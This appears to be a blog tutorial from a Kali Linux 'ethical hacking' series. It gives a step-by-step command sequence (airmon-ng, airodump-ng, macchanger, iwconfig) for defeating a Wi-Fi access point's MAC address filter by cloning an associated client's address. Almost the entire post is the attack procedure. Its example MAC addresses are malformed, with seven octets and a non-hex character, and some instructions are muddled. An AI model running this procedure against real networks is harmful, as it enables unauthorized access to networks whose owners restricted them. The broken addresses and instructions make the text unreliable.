>> Welcome all, to this series of Kali Linux for Ethical Hacking. This is third part and I’ll explain process of bypassing the MAC Address Filter on an AP (Access Point).
# 3 Basic Process:
– Finding the AP: airmon-ng & airodump-ng
– Finding an associated client: airodump-ng
– Finally, using the MACchanger
# . . . Let’s Begin
– Before starting, make sure that you have eth0, lo, wlan0 in action. (Go to terminal and run ifconfig.)
– Let’s start to monitor on the wireless interface.
Run:
airmon-ng start wlan0
– After executing above command, we must get new interface mon0 (Monitor mode enabled.)
– Verify that both interfaces are up and running,
Run:
airmon-ng
– Watch for wlan0 and mon0,
Run:
airodump-ng mon0
– For monitoring all the APs that Kali Linux OS can find out.
– In the next step, you’ll get BSSID and ESSID, channel, cipher. If there’s any hidden SSID, then ESSID will be formatted like this: <length: 0> or with no SSID.
Note: We saw in second part how to uncover this hidden SSID. But, here you can use any SSID with Open Encryption, or SSID with known password.
– We will use the MAC address that was seen in part 2. i.e. 00:A1:B2:11:20:13:5T and channel ‘1’ (Assume the MAC address filter is done in this system. Let’s suppose it’s SSID is nhc-BJ.)
– Now, we try to find out the client and his MAC associated with this AP (nhc-BJ).
– So we can use that MAC to bypass filter,
Run:
airodump-ng -c 1 -a –bssid 00:A1:B2:11:20:13:5T mon0
(-c is for channel, channel is 1 for BSSID; we’re are trying to connect. -a is for showing only the client associated with this BSSID.)
– You’ll get the MAC address with the station associated with that AP, and this is the client’s station. (Let’s assume Mac = 00:C1:52:11:20:13:7D).
– CTRL+C (press)
– Run:
macchanger –help
(notice, -m for setting mac)
-Run:
macchanger -m 00:C1:52:11:20:13:7D wlan0
(If the device or resource busy, then run following command:)
airmon-ng stop wlan0
– Run:
macchanger -m 00:C1:52:11:20:13:7D wlan0
(If successful, you’ll see a message like ‘faked MAC’)
-Run:
ifconfig wlan0 down
ifconfig wlan0 up
(Let’s see whether we can associate with the SSID now or not with this faked MAC)
– Run:
iwconfig wlan0 essid nhc-BJ channel 1
(If not, run in Kali and run it in BackTrack. Or, see the updated version of Kali.)
iwconfig wlan0
(If successful, the Access Point will be associated.)
No comments:
Post a Comment